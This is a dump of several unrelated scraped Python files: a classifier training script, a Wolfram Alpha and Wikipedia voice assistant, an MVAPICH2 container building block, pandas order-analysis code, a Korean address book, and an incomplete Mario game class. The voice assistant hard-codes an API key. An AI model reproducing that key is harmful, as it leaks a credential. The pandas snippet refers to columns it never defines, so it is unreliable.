FILE_PATTERN.format(\n key=key,\n version=str(version),\n )\n\n with open(filepath, 'w') as f:\n # override previous pickle\n pickle.dump(y, f, -1)\n\n # Clear store.\n self.Y_STORE = {}\n\n def get_X(self, entity_id):\n m_key = MATRIX_KEY % entity_id\n m_file = FILE_PATTERN.format(key=m_key, version=\"*\")\n X = []\n for fp in sorted(glob.glob(m_file)):\n # Put back all parts together.\n if len(X) >= self.MAX_SAMPLES:\n break\n with open(fp, 'r') as f:\n X += pickle.load(f)\n return X\n\n def get_y(self, entity_id):\n v_key = VECTOR_KEY % (entity_id, self.epoch)\n v_file = FILE_PATTERN.format(key=v_key, version=\"*\")\n y = []\n for fp in sorted(glob.glob(v_file)):\n # Put back all parts together.\n if len(y) >= self.MAX_SAMPLES:\n break\n with open(fp, 'r') as f:\n y += pickle.load(f)\n return y\n\n def update_unchanged(self, entities, all_types, row_number):\n idx = -1\n for entity in entities:\n idx += 1\n e_id = entity.split('/')[-1]\n\n y = self.get_y(e_id)\n\n self.Y_STORE[e_id] = y\n\n for t in all_types[idx]:\n type_id = t.split('/')[-1]\n y_t = self.get_y(e_id)\n self.Y_STORE[type_id] = y_t\n\n def update(self, entity_id, entities, all_types, row_number):\n idx = -1\n for entity in entities:\n idx += 1\n e_id = entity.split('/')[-1]\n\n y = self.get_y(e_id)\n\n v = 0\n if entity_id == e_id:\n v = 1\n\n y[row_number] = v\n\n self.Y_STORE[e_id] = y\n\n for t in all_types[idx]:\n type_id = t.split('/')[-1]\n y_t = self.get_y(e_id)\n y_t[row_number] = v\n self.Y_STORE[type_id] = y_t\n\n\ndef main():\n # Load data.\n #loader = Loader()\n #loader.load_data()\n\n # Classify.\n classifier = Classifier(epoch=6)\n #classifier.train()\n classifier.assign_all()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"srom/ensu","sub_path":"disambiguation/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"73417786428","text":"import wolframalpha\nimport wikipedia\nimport PySimpleGUI as sg\nimport pyttsx3\nfrom win32com.client import Dispatch\n\nengine = pyttsx3.init()\nclient = wolframalpha.Client('HGYHP3-QXVAAJ3ATG')\nspeak = Dispatch(\"SAPI.SpVoice\")\n\nsg.theme('DarkBlue')\nlayout = [[sg.Text(\"What are you looking for? \"), sg.InputText()],[sg.Button('Search'), sg.Button('Cancel')]]\nwindow = sg.Window('Digital Assistant', layout)\nspeak.Speak(\"Hello, this is D-A,your digital assistant. What are you looking for? 
\")\n\nwhile True:\n\n event, values = window.read()\n\n if event in (None, 'Cancel'):\n speak.Speak(\"See you later\")\n break\n\n try:\n wiki_res = wikipedia.summary(values[0], sentences=2)\n wolfram_res = next(client.query(values[0]).results).text\n engine.say(wolfram_res)\n sg.PopupNonBlocking(\"Wolfram Result: \" + wolfram_res,\"Wikipedia Result: \" + wiki_res)\n\n except wikipedia.exceptions.DisambiguationError:\n wolfram_res = next(client.query(values[0]).results).text\n engine.say(wolfram_res)\n sg.PopupNonBlocking(wolfram_res)\n\n except wikipedia.exceptions.PageError:\n wolfram_res = next(client.query(values[0]).results).text\n engine.say(wolfram_res)\n sg.PopupNonBlocking(wolfram_res)\n\n except:\n wiki_res = wikipedia.summary(values[0], sentences=2)\n engine.say(wiki_res)\n sg.PopupNonBlocking(wiki_res)\n\n engine.runAndWait()\n\nwindow.close()\n","repo_name":"arnav-gupta-123/Virtual-Assistant","sub_path":"virtual_assistant.py","file_name":"virtual_assistant.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30814037530","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\n\nimport logging # pylint: disable=unused-import\nimport posixpath\nimport re\nfrom copy import copy as _copy\n\nimport hpccm.config\nimport hpccm.templates.ConfigureMake\nimport hpccm.templates.envvars\nimport hpccm.templates.ldconfig\nimport hpccm.templates.rm\nimport hpccm.templates.sed\nimport hpccm.templates.tar\nimport hpccm.templates.wget\n\nfrom hpccm.building_blocks.base import bb_base\nfrom hpccm.building_blocks.packages import packages\nfrom hpccm.common import linux_distro\nfrom hpccm.primitives.comment import comment\nfrom hpccm.primitives.copy import copy\nfrom hpccm.primitives.environment import environment\nfrom hpccm.primitives.shell import shell\nfrom hpccm.toolchain import toolchain\n\nclass mvapich2(bb_base, hpccm.templates.ConfigureMake, hpccm.templates.envvars,\n hpccm.templates.ldconfig, hpccm.templates.rm,\n hpccm.templates.sed, hpccm.templates.tar, hpccm.templates.wget):\n \"\"\"The `mvapich2` building block configures, builds, and installs the\n [MVAPICH2](http://mvapich.cse.ohio-state.edu) component.\n Depending on the parameters, the source will be downloaded from\n the web (default) or copied from a source directory in the local\n build context.\n\n An InfiniBand building block ([OFED](#ofed) or [Mellanox\n OFED](#mlnx_ofed)) should be installed prior to this building\n block.\n\n As a side effect, a toolchain is created containing the MPI\n compiler wrappers. The tool can be passed to other operations\n that want to build using the MPI compiler wrappers.\n\n # Parameters\n\n check: Boolean flag to specify whether the `make check` step\n should be performed. The default is False.\n\n configure_opts: List of options to pass to `configure`. The\n default values are `--disable-mcast`.\n\n cuda: Boolean flag to control whether a CUDA aware build is\n performed. If True, adds `--enable-cuda --with-cuda` to the list\n of `configure` options, otherwise adds `--disable-cuda`. If the\n toolchain specifies `CUDA_HOME`, then that path is used, otherwise\n `/usr/local/cuda` is used for the path. The default value is\n True.\n\n directory: Path to the unpackaged source directory relative to\n the local build context. The default value is empty. 
If this is\n defined, the source in the local build context will be used rather\n than downloading the source from the web.\n\n environment: Boolean flag to specify whether the environment\n (`LD_LIBRARY_PATH` and `PATH`) should be modified to include\n MVAPICH2. The default is True.\n\n gpu_arch: The GPU architecture to use. Older versions of MVAPICH2\n (2.3b and previous) were hard-coded to use \"sm_20\". This option\n has no effect on more recent MVAPICH2 versions. The default value\n is to use the MVAPICH2 default.\n\n ldconfig: Boolean flag to specify whether the MVAPICH2 library\n directory should be added dynamic linker cache. If False, then\n `LD_LIBRARY_PATH` is modified to include the MVAPICH2 library\n directory. The default value is False.\n\n ospackages: List of OS packages to install prior to configuring\n and building. For Ubuntu, the default values are `byacc`, `file`,\n `make`, `openssh-client`, and `wget`. For RHEL-based Linux\n distributions, the default values are `byacc`, `file`, `make`,\n `openssh-clients`, and `wget`.\n\n prefix: The top level install location. The default value is\n `/usr/local/mvapich2`.\n\n toolchain: The toolchain object. This should be used if\n non-default compilers or other toolchain options are needed. The\n default is empty.\n\n version: The version of MVAPICH2 source to download. This value\n is ignored if `directory` is set. The default value is `2.3.1`.\n\n # Examples\n\n ```python\n mvapich2(cuda=False, prefix='/opt/mvapich2/2.3a', version='2.3a')\n ```\n\n ```python\n mvapich2(directory='sources/mvapich2-2.3b')\n ```\n\n ```python\n p = pgi(eula=True)\n mvapich2(toolchain=p.toolchain)\n ```\n\n ```python\n mvapich2(configure_opts=['--disable-fortran', '--disable-mcast'])\n ```\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialize building block\"\"\"\n\n super(mvapich2, self).__init__(**kwargs)\n\n self.__baseurl = kwargs.get('baseurl',\n 'http://mvapich.cse.ohio-state.edu/download/mvapich/mv2')\n self.__check = kwargs.get('check', False)\n self.configure_opts = kwargs.get('configure_opts', ['--disable-mcast'])\n self.cuda = kwargs.get('cuda', True)\n self.directory = kwargs.get('directory', '')\n self.__gpu_arch = kwargs.get('gpu_arch', None)\n self.__ospackages = kwargs.get('ospackages', [])\n self.prefix = kwargs.get('prefix', '/usr/local/mvapich2')\n self.__runtime_ospackages = [] # Filled in by __distro()\n\n # MVAPICH2 does not accept F90\n self.toolchain_control = {'CC': True, 'CXX': True, 'F77': True,\n 'F90': False, 'FC': True}\n self.version = kwargs.get('version', '2.3.1')\n\n self.__commands = [] # Filled in by __setup()\n\n # Input toolchain, i.e., what to use when building\n self.__toolchain = kwargs.get('toolchain', toolchain())\n self.__wd = '/var/tmp' # working directory\n\n # Output toolchain\n self.toolchain = toolchain(CC='mpicc', CXX='mpicxx', F77='mpif77',\n F90='mpif90', FC='mpifort')\n\n # Set the Linux distribution specific parameters\n self.__distro()\n\n # Construct the series of steps to execute\n self.__setup()\n\n # Fill in container instructions\n self.__instructions()\n\n def __instructions(self):\n \"\"\"Fill in container instructions\"\"\"\n\n if self.directory:\n self += comment('MVAPICH2')\n else:\n self += comment('MVAPICH2 version {}'.format(self.version))\n self += packages(ospackages=self.__ospackages)\n if self.directory:\n # Use source from local build context\n self += copy(src=self.directory,\n dest=posixpath.join(self.__wd, self.directory))\n self += shell(commands=self.__commands)\n 
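# Export the environment variables collected in __setup(), e.g. PATH,\n        # LD_LIBRARY_PATH (unless ldconfig is used) and, for CUDA-aware\n        # builds, the PROFILE_POSTLIB stub-library workaround.\n        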
self += environment(variables=self.environment_step())\n\n def __distro(self):\n \"\"\"Based on the Linux distribution, set values accordingly. A user\n specified value overrides any defaults.\"\"\"\n\n if hpccm.config.g_linux_distro == linux_distro.UBUNTU:\n if not self.__ospackages:\n self.__ospackages = ['byacc', 'file', 'make',\n 'openssh-client', 'wget']\n self.__runtime_ospackages = ['openssh-client']\n elif hpccm.config.g_linux_distro == linux_distro.CENTOS:\n if not self.__ospackages:\n self.__ospackages = ['byacc', 'file', 'make',\n 'openssh-clients', 'wget']\n self.__runtime_ospackages = ['openssh-clients']\n else: # pragma: no cover\n raise RuntimeError('Unknown Linux distribution')\n\n def __set_gpu_arch(self, directory=None):\n \"\"\"Older versions of MVAPICH2 (2.3b and previous) were hard-coded to\n use the \"sm_20\" GPU architecture. Use the specified value\n instead.\"\"\"\n\n if self.cuda and self.__gpu_arch and directory:\n self.__commands.append(\n self.sed_step(file=posixpath.join(directory, 'Makefile.in'),\n patterns=[r's/-arch sm_20/-arch {}/g'.format(self.__gpu_arch)]))\n\n def __setup(self):\n \"\"\"Construct the series of shell commands, i.e., fill in\n self.__commands\"\"\"\n\n # Create a copy of the toolchain so that it can be modified\n # without impacting the original.\n toolchain = _copy(self.__toolchain)\n\n tarball = 'mvapich2-{}.tar.gz'.format(self.version)\n url = '{0}/{1}'.format(self.__baseurl, tarball)\n\n # CUDA\n if self.cuda:\n cuda_home = \"/usr/local/cuda\"\n if toolchain.CUDA_HOME:\n cuda_home = toolchain.CUDA_HOME\n\n # The PGI compiler needs some special handling for CUDA.\n # http://mvapich.cse.ohio-state.edu/static/media/mvapich/mvapich2-2.0-userguide.html#x1-120004.5\n if toolchain.CC and re.match('.*pgcc', toolchain.CC):\n self.configure_opts.append(\n '--enable-cuda=basic --with-cuda={}'.format(cuda_home))\n\n # Work around issue when using PGI 19.4\n self.configure_opts.append('--enable-fast=O1')\n\n if not toolchain.CFLAGS:\n toolchain.CFLAGS = '-ta=tesla:nordc'\n\n if not toolchain.CPPFLAGS:\n toolchain.CPPFLAGS = '-D__x86_64 -D__align__\\(n\\)=__attribute__\\(\\(aligned\\(n\\)\\)\\) -D__location__\\(a\\)=__annotate__\\(a\\) -DCUDARTAPI='\n\n if not toolchain.LD_LIBRARY_PATH:\n toolchain.LD_LIBRARY_PATH = posixpath.join(\n cuda_home, 'lib64', 'stubs') + ':$LD_LIBRARY_PATH'\n else:\n if not toolchain.LD_LIBRARY_PATH:\n toolchain.LD_LIBRARY_PATH = posixpath.join(\n cuda_home, 'lib64', 'stubs') + ':$LD_LIBRARY_PATH'\n self.configure_opts.append(\n '--enable-cuda --with-cuda={}'.format(cuda_home))\n\n # Workaround for using compiler wrappers in the build stage\n self.__commands.append('ln -s {0} {1}'.format(\n posixpath.join(cuda_home, 'lib64', 'stubs', 'libnvidia-ml.so'),\n posixpath.join(cuda_home, 'lib64', 'stubs',\n 'libnvidia-ml.so.1')))\n self.__commands.append('ln -s {0} {1}'.format(\n posixpath.join(cuda_home, 'lib64', 'stubs', 'libcuda.so'),\n posixpath.join(cuda_home, 'lib64', 'stubs', 'libcuda.so.1')))\n\n else:\n self.configure_opts.append('--disable-cuda')\n\n if self.directory:\n # Use source from local build context\n self.__set_gpu_arch(\n directory=posixpath.join(self.__wd, self.directory))\n self.__commands.append(self.configure_step(\n directory=posixpath.join(self.__wd, self.directory),\n toolchain=toolchain))\n else:\n # Download source from web\n self.__commands.append(self.download_step(url=url,\n directory=self.__wd))\n self.__commands.append(self.untar_step(\n tarball=posixpath.join(self.__wd, tarball),\n 
directory=self.__wd))\n self.__set_gpu_arch(\n directory=posixpath.join(self.__wd,\n 'mvapich2-{}'.format(self.version)))\n\n self.__commands.append(self.configure_step(\n directory=posixpath.join(self.__wd,\n 'mvapich2-{}'.format(self.version)),\n toolchain=toolchain))\n\n\n self.__commands.append(self.build_step())\n\n if self.__check:\n self.__commands.append(self.check_step())\n\n self.__commands.append(self.install_step())\n\n # Set library path\n libpath = posixpath.join(self.prefix, 'lib')\n if self.ldconfig:\n self.__commands.append(self.ldcache_step(directory=libpath))\n else:\n self.environment_variables['LD_LIBRARY_PATH'] = '{}:$LD_LIBRARY_PATH'.format(libpath)\n\n if self.directory:\n # Using source from local build context, cleanup directory\n self.__commands.append(self.cleanup_step(\n items=[posixpath.join(self.__wd, self.directory)]))\n else:\n # Using downloaded source, cleanup tarball and directory\n self.__commands.append(self.cleanup_step(\n items=[posixpath.join(self.__wd, tarball),\n posixpath.join(self.__wd,\n 'mvapich2-{}'.format(self.version))]))\n\n # Setup environment variables\n self.environment_variables['PATH'] = '{}:$PATH'.format(\n posixpath.join(self.prefix, 'bin'))\n if self.cuda:\n # Workaround for using compiler wrappers in the build stage\n self.environment_variables['PROFILE_POSTLIB'] = '\"-L{} -lnvidia-ml -lcuda\"'.format('/usr/local/cuda/lib64/stubs')\n\n def runtime(self, _from='0'):\n \"\"\"Generate the set of instructions to install the runtime specific\n components from a build in a previous stage.\n\n # Examples\n\n ```python\n m = mvapich2(...)\n Stage0 += m\n Stage1 += m.runtime()\n ```\n \"\"\"\n instructions = []\n instructions.append(comment('MVAPICH2'))\n # TODO: move the definition of runtime ospackages\n instructions.append(packages(ospackages=self.__runtime_ospackages))\n instructions.append(copy(_from=_from, src=self.prefix,\n dest=self.prefix))\n if self.ldconfig:\n instructions.append(shell(\n commands=[self.ldcache_step(\n directory=posixpath.join(self.prefix, 'lib'))]))\n # No need to workaround compiler wrapper issue for the runtime.\n instructions.append(environment(\n variables=self.environment_step(exclude=['PROFILE_POSTLIB'])))\n return '\\n'.join(str(x) for x in instructions)\n","repo_name":"unholywhale/hpc-container-maker","sub_path":"hpccm/building_blocks/mvapich2.py","file_name":"mvapich2.py","file_ext":"py","file_size_in_byte":13670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"33280009022","text":"#%%\ntest = df_og[df_og['Billing Country'] == 'DE']\ntest.shape\n\n#%%\ntest = test.loc[:,['Name', 'Email', 'Financial Status', 'Created at', 'Currency', 'Subtotal', 'Shipping', 'Taxes', 'Total', 'Discount Code', 'Discount Amount', 'Lineitem name', 'Lineitem sku', 'Billing Name']]\n\n#%%\ntest.rename(columns={'Name':'Order_ID','Financial Status':'Status' ,'Created at':'Creation_Date', 'Lineitem name':'Product Name', 'Lineitem name':'Product_ID', 'Billing Name': 'Customer_Name'}, inplace=True)\n\n#%%\ntest['Creation_Date'] = pd.to_datetime(test['Creation_Date'], errors='coerce')\n\n#%%\n#test = test[~test['Status'].isin(['Cancelled'])]\n#test = test.fiilna(0)\n#%%\ntest.set_index('Order_ID', inplace=True)\n\n#%%\n#test.Customer_Name.isnull().sum()\ndf_og['Paid at'].isnull().sum()\n\n#%%\ntest['First_Order'] = test.groupby(level=0)['Creation_Date'].min()\ntest['First_Order_YM'] = test.groupby(level=0)['Creation_Date'].min().apply(lambda x: 
x.strftime('%Y-%m'))\n\n#%%\ntest.reset_index(inplace=True)\ntest['Creation_Date_YM'] = test['Creation_Date'].apply(lambda x: x.strftime('%Y-%m'))\nfirst_orders = test.sort_values('Creation_Date').groupby('Email')['Order_ID'].first().values\ntest['Customer_Type'] = np.where(test['Order_ID'].isin(first_orders),'New','Returning')\n\n#%%\ntest['Creation_Date'] = pd.to_datetime(test['Creation_Date'], errors='ignore', utc=True)\ntest['Year'] = test['Creation_Date'].dt.year\n\n\n#%%\ntest['Week'] = test['Creation_Date'].dt.isocalendar().week\ntest['Year_Week'] = test['Creation_Date'].dt.strftime(\"%Y-%W\")\n\n#%%\ntest = test.astype({'Subtotal':'float64', 'Shipping':'float64', 'Taxes':'float64', 'Total':'float64', 'Discount Amount':'float64'})\ntest['ValueNOVAT'] = test.Total - test.Taxes\ntest\n\n\n\n\n#%%\ntest = test[~test['Status'].isin(['Cancelled'])]\ntest.set_index('Order_ID', inplace=True)\ntest['First_Order'] = test.groupby(level=0)['Creation_Date'].min()\ntest['First_Order_YM'] = test.groupby(level=0)['Creation_Date'].min().apply(lambda x: x.strftime('%Y-%m'))\ntest.reset_index(inplace=True)\ntest['Creation_Date_YM'] = test['Creation_Date'].apply(lambda x: x.strftime('%Y-%m'))\nfirst_orders = test.sort_values('Creation_Date').groupby('E-mail')['Order'].first().values\ntest['Customer_Type'] = np.where(test['Order'].isin(first_orders),'New','Returning')\ntest['Payment_Type'] = np.where(test['Payment'] == 'Payment Amazon','Amazon','Webshop')\ntest['Year'] = test['Creation_Date'].dt.year\ntest['Week'] = test['Creation_Date'].dt.week\ntest['Year_Week'] = test['Creation_Date'].dt.strftime(\"%Y-%W\")\n","repo_name":"rahichan/angela_legacy","sub_path":"POM/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"86313835261","text":"import sys\n\n\npList = [\n {\"seq\":1, \"name\":\"HONG\", \"phone\":\"010-1111-1111\", \"addr\":\"서울시 강남구\"},\n {\"seq\":2, \"name\":\"KIM\", \"phone\":\"010-1111-2222\", \"addr\":\"대구시 수성구\"},\n {\"seq\":3, \"name\":\"LEE\", \"phone\":\"010-1111-3333\", \"addr\":\"부산시 사하구\"},\n {\"seq\":4, \"name\":\"PARK\", \"phone\":\"010-1111-4444\", \"addr\":\"광주시 송정동\"}\n]\n\nsequence = 5\n\ndef menu() :\n print(\"1.입력 2.출력 3.검색 4.수정 5.삭제 6.종료\")\n no = int(input(\"선택: \"))\n return no\n\n\ndef title() :\n print(\"-\"*50)\n print(\"{: ^50}\".format(\" 주소록 \"))\n print(\"-\"*50)\n\n\ndef search_list() :\n search_name = input(\"이름으로 검색 >>\")\n while len(search_name) == 0:\n print(\"검색어를 입력 하지 않았습니다.\")\n search_name = input(\"이름으로 검색 >>\")\n\n newList = []\n for p in pList:\n if p['name'] == search_name:\n newList.append(p)\n\n if len(newList) == 0:\n print(\"검색 결과 없습니다.\")\n return False\n\n print(\"{: <3}|{: ^10}|{: ^20}|{: ^30}\".format('no', 'NAME', 'PHONE', 'ADDRESS'))\n print(\"-\" * 60)\n for i, p in enumerate(newList):\n print(\"{: <3}|{: ^10}|{: ^20}|{: ^30}\".format(p['seq'], p['name'], p['phone'], p['addr']))\n\n # 검색 결과가 있을 경우 True 반환\n return True\n\ndef process() :\n global sequence\n\n title()\n\n while True :\n no = menu()\n print(f\"{no}번을 선택 했습니다.\")\n\n if no == 1 :\n print(\"=== 입력 기능 ===\")\n p = {\n \"seq\":sequence,\n \"name\": input(\"성명 입력>> \"),\n \"phone\": input(\"전화 번호 입력>> \"),\n \"addr\": input(\"주소 입력>> \")\n }\n pList.append(p)\n # 함수 외부 변수(global)는 전변수로 지정 해야 한다.\n # 함수 안에서 함수 외부의 변수를 수정 하기 위해 global 사용.\n sequence = sequence + 1\n elif no == 2 :\n print(\"=== 출력 기능 ===\")\n print(\"{: <3}|{: ^10}|{: ^20}|{: 
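The exploratory pandas script above derives `Customer_Type` by taking each e-mail's chronologically first order. A self-contained sketch of the same idea on toy data:

```python
import numpy as np
import pandas as pd

orders = pd.DataFrame({
    "Order_ID": ["#1", "#2", "#3", "#4"],
    "Email": ["a@x.com", "b@x.com", "a@x.com", "b@x.com"],
    "Creation_Date": pd.to_datetime(["2021-01-01", "2021-01-05",
                                     "2021-02-01", "2021-03-01"]),
})

# First order per customer, then flag every other order as "Returning".
first_orders = (orders.sort_values("Creation_Date")
                      .groupby("Email")["Order_ID"].first().values)
orders["Customer_Type"] = np.where(orders["Order_ID"].isin(first_orders),
                                   "New", "Returning")
print(orders)
```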
^30}\".format('no', 'NAME', 'PHONE', 'ADDRESS'))\n print(\"-\" * 60)\n for i, p in enumerate(pList) :\n print(\"{: <3}|{: ^10}|{: ^20}|{: ^30}\".format(p['seq'],p['name'], p['phone'], p['addr']))\n elif no == 3 :\n print(\"=== 검색 기능 ===\")\n # 이름으로 검색 : LEE\n # pList의 요소 중 name이 LEE인 요소를 새 리스트에 저장.\n # 새 리스트 출력\n search_list()\n\n elif no == 4 :\n print(\"=== 수정 기능 ===\")\n if search_list() :\n modify_no = int(input(\"수정 할 no선택 >>\"))\n # modify_no로 seq가 같은 요소를 찾는다.\n # seq가 같은 요소의 내용을 새로 입력 받는다.\n for p in pList :\n if p[\"seq\"] == modify_no :\n p['name'] = input(\"새 이름 입력 >>\")\n p['phone'] = input(\"새 전화 입력 >>\")\n p['addr'] = input(\"새 주소 입력 >>\")\n print(\"수정 완료!\")\n\n elif no == 5 :\n print(\"=== 삭제 기능 ===\")\n if search_list() :\n modify_no = int(input(\"삭제 할 no선택 >>\"))\n # modify_no로 seq가 같은 요소를 찾는다.\n # seq가 같은 요소의 내용을 새로 입력 받는다.\n for p in pList :\n if p[\"seq\"] == modify_no :\n pList.remove(p)\n print(\"삭제 완료!\")\n break\n\n elif no == 6 :\n print(\"--- 프로그램 종료 ---\")\n print(\"다음에 만나요.\")\n sys.exit(0);\n break\n\n else :\n print(\"해당 사항 없습니다!\")\n\n print(\"\\n\")\n\n\nif __name__ == '__main__' :\n process()","repo_name":"seohyeongwon/pycharm","sub_path":"pycharm_work/pythonProject/ch05/ch05mini.py","file_name":"ch05mini.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71552131388","text":"from pico2d import *\n\n\nclass Mario():\n def __init__(self):\n self.image = load_image('mario-side.png')\n self.flowerimage = load_image('mario-side-flower.png')\n self.star1 = load_image('mario-side-star1.png')\n self.star2 = load_image('mario-side-star2.png')\n self.star3 = load_image('mario-side-star3.png')\n self.star4 = load_image('mario-side-star4.png')\n self.star5 = load_image('mario-side-star5.png')\n self.star6 = load_image('mario-side-star6.png')\n \n self.x,self.y=100,100 #시작 좌표\n self.frame=0 #프레임 조절\n self.frame_size_x=27 #프레임 가로 길이 조절\n self.frame_empty_x=16 #이미지 앞에 빈공간 없애주기\n self.size_x=29 #이미지 가로 사이즈\n self.size_y=40 #이미지 세로 사이즈\n self.frame_y=2465 #이미지 세로 위치 조절\n #캐릭터의 움직임 속도\n self.move_x=0\n self.move_y=0\n # delay와 속도 조절\n self.frame_control=0\n self.frame_control_jump=0\n #현재 캐릭터의 움직임 속도\n self.speed=0\n self.dir=0\n #캐릭터 움직임\n self.jump=False\n self.after_jump=0\n self.run=0.05\n self.run_count=0\n #캐릭터 크기\n self.mario_size_x=44\n self.mario_size_y=60\n #충돌 타이머\n self.timer=0\n #마리오의 현재 상태\n self.state = 0 #0은바닥 1은 블럭위\n self.floor = 100 #바닥 좌표\n self.power = 0 #0 기본 상태,1 미니 상태, 2 꽃 먹은 상태,3 별 상태\n self.star_timer=0\n \n def draw(self):\n if self.x < 20:\n self.x = 20\n if self.x > 780:\n self.x = 780\n if self.timer > 0:\n self.timer-=100\n if self.timer%1000 != 0 and self.timer%500 != 0:\n self.image.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.timer == 0:\n if self.power == 0 or self.power == 1:\n self.image.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.power == 2:\n self.flowerimage.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.power == 3:\n if self.star_timer > 0:\n self.star_timer-=200\n if self.star_timer%60000 < 10000:\n self.star1.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, 
self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%50000 < 10000:\n self.star2.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%40000 < 10000:\n self.star3.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%30000 < 10000:\n self.star4.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%20000 < 10000:\n self.star5.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%10000 < 10000:\n self.star6.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer <= 0:\n self.power = 0\n \n def update(self):\n if self.frame_control==10:\n if self.dir==0:\n if self.jump == True:\n self.frame_control_jump+=1\n if self.frame_control_jump<2:\n self.frame = 0\n elif self.frame_control_jump<3:\n self.frame = 1\n elif self.frame_control_jump<4:\n self.frame = 2\n elif self.frame_control_jump<7:\n self.frame = (self.frame+1)%6\n #self.move_y=0\n if self.frame_control_jump==7:\n self.frame_control_jump=0\n self.jump = False\n self.after()\n elif self.jump == False:\n self.frame = (self.frame+1) % 6\n elif self.dir==1:\n self.frame = (self.frame-1) % 6\n self.frame_control=0\n \n self.frame_control+=1\n \n self.x += self.move_x*2\n self.y += self.move_y\n # if self.jump==True:\n # if self.frame_control_jump<3:\n # self.move_y-=0.8\n # elif self.frame_control_jump<4:\n # self.move_y-=0.8\n # elif self.frame_control_jump==4:\n # self.move_y=0\n # elif self.jump=False:\n \n # if self.state == 0: \n # if self.mario_size_y == 30:\n # if self.y <= 85:\n # self.y=85\n # self.move_y=0\n # elif self.y > 85:\n # self.move_y-=0.8\n # elif self.mario_size_y == 60:\n # if self.y <= 100:\n # self.y=100\n # self.move_y=0\n # elif self.y > 100:\n # self.move_y-=0.8\n if self.mario_size_y == 30:\n if self.y < self.floor-15:\n self.y = self.floor-15\n self.move_y = 0\n elif self.y > self.floor-15:\n self.move_y-=0.8 \n elif self.mario_size_y == 60:\n if self.y < self.floor:\n self.y = self.floor\n self.move_y=0\n elif self.y > self.floor:\n self.move_y-=0.8\n \n\n\n \n if self.move_x >=0.5 and self.move_x<=3:\n self.move_x+=self.run\n elif self.move_x<=-0.5 and self.move_x>=-3:\n self.move_x-=self.run\n \n def right(self):\n self.speed=0.5\n self.move_x+=self.speed\n self.after_jump=1\n if self.jump==True:\n self.frame_size_x=31\n self.frame_empty_x=14\n self.size_x=31\n self.size_y=43\n self.frame_y=2401\n if self.jump == False:\n self.frame=0\n self.frame_size_x=34\n self.frame_empty_x=10\n self.size_x=34\n self.size_y=40\n self.frame_y=2340\n \n def left(self):\n self.speed=0.5\n self.move_x-=self.speed\n self.after_jump=2\n if self.jump==True:\n self.frame_size_x= -31\n self.frame_empty_x=1059\n self.size_x=31\n self.size_y=43\n self.frame_y=2401\n if self.jump == False:\n self.frame=0\n self.frame_size_x= -34\n self.frame_empty_x=1060\n self.size_x=34\n self.size_y=40\n self.frame_y=2340\n \n def stop_right(self):\n self.speed=0\n self.move_x=0\n 
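The `update()` method above implements gravity by subtracting 0.8 from `move_y` each tick and clamping the sprite to the floor. Isolated, with the constant copied from the class, the physics step looks like this:

```python
def gravity_step(y, move_y, floor, gravity=0.8):
    # Move, then either rest on the floor or keep accelerating downward.
    y += move_y
    if y < floor:
        return floor, 0.0
    if y > floor:
        return y, move_y - gravity
    return y, move_y

y, vy = 140.0, 0.0
for _ in range(12):
    y, vy = gravity_step(y, vy, floor=100.0)
print(y, vy)  # the sprite has settled on the floor: 100.0 0.0
```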
self.after_jump=3\n if self.jump == False:\n #self.move_y=0\n self.frame=0\n self.frame_y=2465\n self.frame_empty_x=16\n self.frame_size_x=27\n self.size_x=29\n self.size_y=40\n\n def stop_left(self):\n self.speed=0\n self.move_x=0\n self.after_jump=4\n if self.jump == False:\n #self.move_y=0\n self.frame=0\n self.frame_y=2465\n self.frame_empty_x=1059\n self.frame_size_x=-27\n self.size_x=29\n self.size_y=40\n\n def left_jump(self):\n if self.jump == False:\n self.frame_control=-1\n self.move_y=16\n self.frame=0\n self.frame_size_x= -31\n self.frame_empty_x=1059\n self.size_x=31\n self.size_y=43\n self.frame_y=2401\n self.jump=True\n \n def right_jump(self):\n if self.jump == False:\n self.frame_control=-1\n self.move_y=16\n self.frame=0\n self.frame_size_x=31\n self.frame_empty_x=14\n self.size_x=31\n self.size_y=43\n self.frame_y=2401\n self.jump=True\n \n def after(self):\n if self.after_jump==1:\n self.frame=0\n self.frame_size_x=34\n self.frame_empty_x=10\n self.size_x=34\n self.size_y=40\n self.frame_y=2340\n elif self.after_jump==2:\n self.frame=0\n self.frame_size_x= -34\n 